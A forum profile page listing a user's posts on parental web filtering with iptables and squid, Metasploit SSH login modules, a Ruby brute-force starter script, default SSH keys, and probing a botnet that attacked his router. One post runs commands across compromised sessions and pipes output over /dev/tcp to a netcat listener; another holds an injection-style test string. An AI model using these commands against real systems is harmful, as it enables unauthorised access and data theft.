Jump to content

i8igmac

Dedicated Members
 View Profile  See their activity

  • Posts

    939

  • Joined

  • Last visited

  • Days Won

    22

 Content Type 

Posts posted by i8igmac

    Web Filter or Proxy?

    in Security

    Posted

    6 hours ago, PoSHMagiC0de said:

    If you have a raspberry pi you could always use pi-hole.

    https://pi-hole.net/

    Do not know how advanced your router is but if you can setup separate DNS options for reserved clients then you can setup their DNS to point to pi-hole.  Now you can blackhole any DNS requests to sites you do not want them having access to.  Do not know if pi-hole can mac filter requests but I do know it can act as a DHCP server too.  It will give you an insight of all the queries they make too..in essence their sites.  It pretty much black holes any DNS requests for sites you do not want.

    You could go with squid but you will need to tell the clients to use it via proxy settings.  If you are really serious you could put a Snort/Saracata machine in line to do sniffing and filtering which will force them through it.  Adding a cert trusted by the clients will give you insight into their https request contents as well.

    I'm not doubting the idea here just pointing out the configuration I have explained with the use of a kid-safe-wifi-access point...

     

    All devices associated will be effected by the iptable rules with out the need to configure proxy settings on each machine or each application...

     

    You can forward the traffic to pi-hole or squid... the access point running iptable rules is simply a control point...

     

    full control of traffic is full control.

    Web Filter or Proxy?

    in Security

    Posted · Edited by i8igmac

    11 hours ago, G-Stress said:

    Thanks for all the info and quick response guys. My babies are (about to be 8) this Wednesday and 9. Their good kids I don't really worry about them getting curious at least not yet, but I don't want any accidents either. 

    I remember hearing about Squid years ago, but I've never messed with it. We primarily use Chrome, but being that IE would still be an option, I want to really lock things down at the router/ap level. YouTube, I agree there are some things on there not suitable for young kids, but that's the one thing where I trust and allow them to watch appropriate content. So far I've been blessed, the biggest issue there is those compilation videos where some clips are fine then some have a lot of cussing, etc. 

    I ran DD-WRT for years, but never played with iPtables. I guess now my concern is which would be more reliable/stable and do the best job? If Squid then what would be the best preferred setup via OS to run it on or in a VM? Also does iPtables or Squid do any form of reporting via emial or txt in the even anyone on that network tried to search for say porn or would I have to manually check logs? 

    I will probably be using a nighthawk router and soon a UniFi AP Pro access point for that network setup. 

    If the traffic is controlled at the router then it would take more skill to bypass this filtering...

     

    open source router OS that includes iptables really can be powerful.

     

    The simplest method might simply be to redirect all the kids traffic to your squid machine.

     

    http://www.penguintutor.com/kidsafe.php

     

    http://www.pihomeserver.fr/en/2015/09/01/un-controle-parental-grace-au-raspberry-pi-squid-et-squidguard/

    I like how the squid config looks at this last weblink...

     

    If you get your self a propper setup please share the configuration files.

     

    Installing certificates on the kids devices also brings the ability to log the traffic.

     

    • iptables -t nat -A PREROUTING -i eth0 -s ! squid-box -p tcp --dport 80 -j DNAT --to squid-box:3128
    • iptables -t nat -A POSTROUTING -o eth0 -s local-network -d squid-box -j SNAT --to iptables-box
    • iptables -A FORWARD -s local-network -d squid-box -i eth0 -o eth0 -p tcp --dport 3128 -j ACCEPT

     

    Web Filter or Proxy?

    in Security

    Posted

    get a cheap router from goodwill. Make sure you check the model number before purchase for dd-wrt compatibility... If it has wireless n or 5.8 ghz speeds then that's a SCORE...

     

    flash with new open source firmware, configure the device as a kids wifi repeater...

     

    Now you can setup custom iptable rules. I'm sure there are already documented iptable configs online for kid safe surfing...

     

    Locking a folder with a batch file

    in Applications & Coding

    Posted

    34 minutes ago, digip said:

    Um. Open a command prompt. Go to the place where "MyStuff" was(the aprent directory), and do the following:

      

    
dir /ahs

    Now, CD into the listed hidden directory. Now do dir again(or add the /ahs if all files are set to the same attributes and hidden)

    This does nothing other than change the files attributes, to hidden, and system, which can still be seen and accessed. Basically: 

    
ren "poop" "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

dir /ahs

attrib -h -s "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "poop2.{21EC2020-3AEA-1069-A2DD-08002B30309D}" "poop"

dir

     

    That is not entirely true, there are a few if expression's followed by a proper Echo.

    your fourms blocks my content that includes weblink or code

    in Questions

    Posted · Edited by i8igmac

    3 hours ago, digip said:

    I just got one of those blocks, when pasting links from twitter. No code, just linking and quote from a tweet was enough to trigger it.

     

    https://imgur.com/a/YH7eF

     

    here is the post - 

     

    It can be extremely frustrating when you spend 30 minutes writing content then its all lost once you click submit.

     

    It can be difficult to copy/paste information and organizing from my android, I do most of everything from my phone. it happen again lastnight from my labtop. Extremely frustrating...

     

    I think it can be triggered when you don't use (code) tabs (quote) tabs.

     

    The captcha seems to be effective enough. Disable the tarded filter.  I doubt code injection will be successful from posting content...

     

    may sound ironic but if anything this content filtering has made hak5 more vulnerable.

     

    This could be the downfall of hak5. fresh content is important. This has prevent me from posting content several times.

    Metasploit. Help modify ssh_login.rb

    in Applications & Coding

    Posted · Edited by i8igmac

    i hope to place a if expression before SUCCESS happens. 

    if response.data.includes?("Please login:")
      #then submit the current CREDS
      scanner.ssh_socket.send_data(creds.user+"\n")
      scanner.ssh_socket.send_data(creds.pass+"\n")
end

     

     

     

    Here is the modules/auxiliary/scanner/ssh/ssh_login.rb 

    ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'
require 'metasploit/framework/login_scanner/ssh'
require 'metasploit/framework/credential_collection'

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::CommandShell

  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'           => 'SSH Login Check Scanner',
      'Description'    => %q{
        This module will test ssh logins on a range of machines and
        report successful logins.  If you have loaded a database plugin
        and connected to a database this module will record successful
        logins and hosts so you can track your access.
      },
      'Author'         => ['todb'],
      'References'     =>
        [
          [ 'CVE', '1999-0502'] # Weak password
        ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' => {'VERBOSE' => false} # Disable annoying connect errors
    )

    register_options(
      [
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        Opt::Proxies,
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )

  end

  def rport
    datastore['RPORT']
  end

  def session_setup(result, ssh_socket)
    return unless ssh_socket

    # Create a new session
    conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)

    merge_me = {
      'USERPASS_FILE' => nil,
      'USER_FILE'     => nil,
      'PASS_FILE'     => nil,
      'USERNAME'      => result.credential.public,
      'PASSWORD'      => result.credential.private
    }
    info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})"
    s = start_session(self, info, merge_me, false, conn.lsock)
    self.sockets.delete(ssh_socket.transport.socket)

    # Set the session platform
    case result.proof
    when /Linux/
      s.platform = "linux"
    when /Darwin/
      s.platform = "osx"
    when /SunOS/
      s.platform = "solaris"
    when /BSD/
      s.platform = "bsd"
    when /HP-UX/
      s.platform = "hpux"
    when /AIX/
      s.platform = "aix"
    when /Win32|Windows/
      s.platform = "windows"
    when /Unknown command or computer name/
      s.platform = "cisco-ios"
    end

    s
  end


  def run_host(ip)
    @ip = ip

    cred_collection = Metasploit::Framework::CredentialCollection.new(
      blank_passwords: datastore['BLANK_PASSWORDS'],
      pass_file: datastore['PASS_FILE'],
      password: datastore['PASSWORD'],
      user_file: datastore['USER_FILE'],
      userpass_file: datastore['USERPASS_FILE'],
      username: datastore['USERNAME'],
      user_as_pass: datastore['USER_AS_PASS'],
    )

    cred_collection = prepend_db_passwords(cred_collection)

    scanner = Metasploit::Framework::LoginScanner::SSH.new(
      host: ip,
      port: rport,
      cred_details: cred_collection,
      proxies: datastore['Proxies'],
      stop_on_success: datastore['STOP_ON_SUCCESS'],
      bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
      connection_timeout: datastore['SSH_TIMEOUT'],
      framework: framework,
      framework_module: self,
    )

    scanner.verbosity = :debug if datastore['SSH_DEBUG']

    scanner.scan! do |result|
      credential_data = result.to_h
      credential_data.merge!(
          module_fullname: self.fullname,
          workspace_id: myworkspace_id
      )
      case result.status
      when Metasploit::Model::Login::Status::SUCCESSFUL
        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}' '#{result.proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
        credential_core = create_credential(credential_data)
        credential_data[:core] = credential_core
        create_credential_login(credential_data)
        session_setup(result, scanner.ssh_socket)
        :next_user
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
        vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}"
        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
        invalidate_login(credential_data)
        :abort
      when Metasploit::Model::Login::Status::INCORRECT
        vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
        invalidate_login(credential_data)
        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
      else
        invalidate_login(credential_data)
        scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed?
      end
    end
  end
end

     

    Metasploit. Help modify ssh_login.rb

    in Applications & Coding

    Posted · Edited by i8igmac

     

    here is a example of logging into a keyboard-interactive login shell.rb

    this is a start of a brute force keyboard-interactive ssh 

    require 'rubygems'
require 'net/ssh'
# 73.9.26.15
host=ARGV[0]
user=ARGV[1]
pass=ARGV[2]
result=''
host_execution=false

   Net::SSH.start(host, user, :password => pass) do |ssh|     
  # Open a channel
    channel = ssh.open_channel do |channel, success|
    channel.request_pty
    channel.exec("help")
	
	
    channel.on_data do |channel, data|
	print data
	sleep 3
        # Send the password
	if data.include?("login:")
        channel.send_data "#{user}\n"
#	print("#{user}")
	end

	if data.include?("password :")
	channel.send_data("#{pass}\n")
	print("#{pass}")
        end

	if host_execution==false
		if data.include?('rkscli:')
		host_execution=true
		puts channel.send_data("help\n")
		channel.wait
		end
	end
	
	if host_execution==true
		if data.include?('rkscli:')
#		puts channel.send_data(gets)
		channel.wait
		end	
	end

    end
  end
  # Wait for opened channel
  channel.wait

end

     

    Unknown Computer appeared on RAT?

    in Questions

    Posted

    What ports are used, when a target machine runs the trojin, does it connect back to your machine? If so then you would have configured port forwarding? What port if this?

     

    You should monitor this port, its possible random traffic hit your open port but also possible your tool is a backdoor. hackforum is full of bs tools.

     

    I may have misunderstood what you see. A vnc session? Maybe some one ran your trojin from a vm.

     

    your fourms blocks my content that includes weblink or code

    in Questions

    Posted · Edited by i8igmac

    26 minutes ago, Sebkinne said:

    So our Cloudflare setup blocked your request because it detected a RCE attack. No idea why that would trigger from some links in the post, but I would suggest you try posting them again.

    This is the 3rd time. Previous attempts to post content included some ruby code. 

     

    https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/login_scanner/ssh.rb

     

    Edit. Strange it works this time. Ill take screen shots next time this happens 

    ;.,/'[]{8\=-~=~ `ls` system("uname") }

    Ssh keyboard-interactive authentication... ruby automation?

    in Questions

    Posted

    I'm looking to automate the login process on a my router running dropbear. This ssh service is configured in a way that would handle ssh logins with keyboard-interactive authentication.

     

    if you are unsure what this is. You can test your local machines 

    ssh -o PreferredAuthentications=none -v 192.168.0.1

    Authentications that can continue: publickey,password

     

    Typically you would see (publickey,password)

     

    In My situation this information is not displayed and I'm forced to login with a interactive session.

     

    when you enter a interactive session you would see this below... notice how the user has already been determined by the command used but the session ask for the username 

    ssh admin@192.168.69.1

     

    welcome to Ruckus running dropbear

    Please login: admin

    Password:******

     

    I hope to use ruby net/ssh or even metasploit to login. So far all my test to automate the login process have failed... there is some documentation with ruby net/ssh and keyboard-interactive sessions but I can't find any examples online.

    Metasploit ssh_login_pubkey

    in Questions

    Posted · Edited by i8igmac

    3 hours ago, PoSHMagiC0de said:

    Yelp, new installations of distros from iso generates new keys.  If it is an img that is just copied to device like pi or phone the keys will be whatever they are in that image unless ssh is not installed in which case when it ssh server is installed it will generate new keys.

    What about lot devices. Routers, network storage, arm devices. its possible these kind of devices where flashed with duplicate SSH_keys.

     

     

    edit;

    Or if a bunch of identicle devices where flashed with the same os, could the mac address be incorperated in generating the new ssh key or something predictable.

    Metasploit ssh_login_pubkey

    in Questions

    Posted

    4 hours ago, PoSHMagiC0de said:

    That pertains to prebuilt images for non PC devices.  Nethunter and Kali for Raspberry PI or other Arm devices comes as a preinstalled OS image, same goes for the virtual images.  Those will have default keys and you can get them from the images when downloaded.  Anyone that used the ISO to install will have new keys because the package is installed at that moment hence it generates the keys right there.

     

    So. I guess I misunderstood...

     

    During installation, a new key is generated?

     

    The same goes for routers and other little nas devices?

    Metasploit ssh_login_pubkey

    in Questions

    Posted

    im looking for a collection of keys i could play around with, does any one know of a list of default keys for download? Does such a thing exist?

     

    This metasploit module will attempt to loginto a host with a set KEY => kali./ssh/ssh_key

     

    Just a example, any one who installs kali could be vulnerable to this type of attack, the key is the same on all kali machines, after kali is installed it is recamended this ssh_key be replaced.

     

    so is there a list kf common default ssh keys any one has seen for download?

    My network was brute forced... I let them in lol

    in Security

    Posted · Edited by i8igmac

    I found the CnC... all of these devices are connected to the same identicle ip...

     

    Its a vpn service... so I guess all that is left to do is contact the vpn service and submit the logs...

     

      

    turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done

    first i started a listiner that greps for a specific ip...

    then i sent 2 commands off to all current sessions 

    msf auxiliary(ssh_login) > sessions all  -c 'netstat -nt > net'

msf auxiliary(ssh_login) > sessions all -c 'cat < net > /dev/tcp/turdsplash.ip/8888

     

    then the results pour into my netcat listener 

    turdsplash-1090t turdsplash # while true; do nc -l -p 8888 | grep 217.23.5.33; done
tcp        0      0 192.168.1.130:42074     217.23.5.33:443         ESTABLISHED 
tcp        0      0 192.168.1.130:44592     217.23.5.33:443         CLOSE_WAIT  
tcp        0      0 192.168.10.101:40764    217.23.5.33:443         ESTABLISHED 
tcp        0      0 192.168.10.102:47652    217.23.5.33:443         CLOSE_WAIT  
tcp        0      0 192.168.1.4:55475       217.23.5.33:443         ESTABLISHED 
tcp        0      0 192.168.1.4:39033       217.23.5.33:443         CLOSE_WAIT  
tcp        0      0 192.168.1.103:47597     217.23.5.33:443         ESTABLISHED 
tcp        0      0 192.168.1.103:56610     217.23.5.33:443         CLOSE_WAIT

     

    i could turn this into a metasploit module or resource script.

    My network was brute forced... I let them in lol

    in Security

    Posted

    On 8/5/2017 at 7:03 AM, Spoonish said:

    Roy is here to save the day!♪♫

    You could help in providing mind bottling theories to solving this question... how do you get shells...

     

     

    The honey pot was fun but here was my next steps I took to exploring this botnet that is attacking my Super-L33t-wifi-router

     

    There have been questions around here about seting up metasploit modules and configuring your exploits to set your reverse meterpreter with a public ip... I have answered in this video.

     

    If any one wants a demonstration on the steps I took in setting up the honey pot and ip tables used to redirect and monitor traffic. I could make a video.

    • Like 3

    Mac address gps tracker. Google database?

    in Questions

    Posted

    17 minutes ago, Just_a_User said:

    Wasn't that something Sammy Kamkar did but google borked it. He says its still possible for the motivated reader.

    "I then take the MAC address and send it along to Google Location Services. This is an HTTP-based service where router MAC addresses are mapped to approximate GPS "

    http://www.samy.pl/mapxss/

    This looks interesting. I was thinking  client mac addresses is what I maybe looking for.

    Mac address gps tracker. Google database?

    in Questions

    Posted · Edited by i8igmac

    Google used to drive around and log mac addresses of access points and log gps  location until this raised privacy concerns.

     

    So what they did after this was used smart phones to collect this data in the same manner but with the proper terms and conditions accepted by the user. 

     

    One of my habits is watching traffic on my network. I have seen my old samsung s5 sending mac adddress with gps x,y locations in plain text. This was a running service that sparked my intrest.

     

    this information can be used to locate a  labtop, tablet, cell phone or anything with a mac address.

     

    If millions Of smart phone users have been collecting this data and building googles database. It should be no problem to search for a mac address and retrieve a gps location.

     

    Here is a example of a mac address and gps logger/tracker. https://cellphonetrackers.org/gsm/wifi-tracker.php

     

    Here is an google api https://developers.google.com/maps/documentation/geolocation/intro

     

    Any one know if google has given public accesss to this database?

×
×
  • Create New...